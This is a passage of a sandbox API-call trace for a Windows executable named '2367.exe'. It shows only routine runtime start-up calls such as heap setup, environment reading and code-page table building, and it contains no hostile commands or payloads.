# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 20.11.2020 06:26:47.849 Process: id = "1" image_name = "2367.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe" page_root = "0x3a979000" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x618 [0045.372] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x36e2f990, dwHighDateTime=0x1d6bf06)) [0045.372] GetCurrentProcessId () returned 0xa14 [0045.372] GetCurrentThreadId () returned 0x618 [0045.372] GetTickCount () returned 0x1146394 [0045.372] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=16563731300) returned 1 [0045.373] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0045.373] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2f0000 [0045.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.376] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0045.376] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0045.376] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0045.376] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0045.377] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.377] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.378] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.378] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.379] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.379] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.379] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.379] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.379] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.379] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.379] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.380] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.380] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0045.380] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x214) returned 0x2f07d0 [0045.380] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.381] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0045.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0045.381] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0045.381] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0045.381] GetCurrentThreadId () returned 0x618 [0045.381] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0045.381] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f09f0 [0045.382] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0045.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0045.382] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0045.382] SetHandleCount (uNumber=0x20) returned 0x20 [0045.382] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" " [0045.382] GetEnvironmentStringsW () returned 0x31f1c48* [0045.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0045.382] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x565) returned 0x2f11f8 [0045.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2f11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0045.382] FreeEnvironmentStringsW (penv=0x31f1c48) returned 1 [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetACP () returned 0x4e4 [0045.383] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x220) returned 0x2f1768 [0045.383] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.384] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0045.384] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0045.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0045.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೉押@Ā") returned 256 [0045.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೉押@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0045.385] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೉押@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.385] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01¬~í\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.385] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೉押@Ā") returned 256 [0045.385] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೉押@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0045.385] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ೉押@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0045.385] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01¬~í\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.385] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4aeee0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe")) returned 0x2e [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.389] SetLastError (dwErrCode=0x0) [0045.389] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.390] GetLastError () returned 0x0 [0045.390] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x37) returned 0x2f1990 [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.391] SetLastError (dwErrCode=0x0) [0045.391] GetLastError () returned 0x0 [0045.392] SetLastError 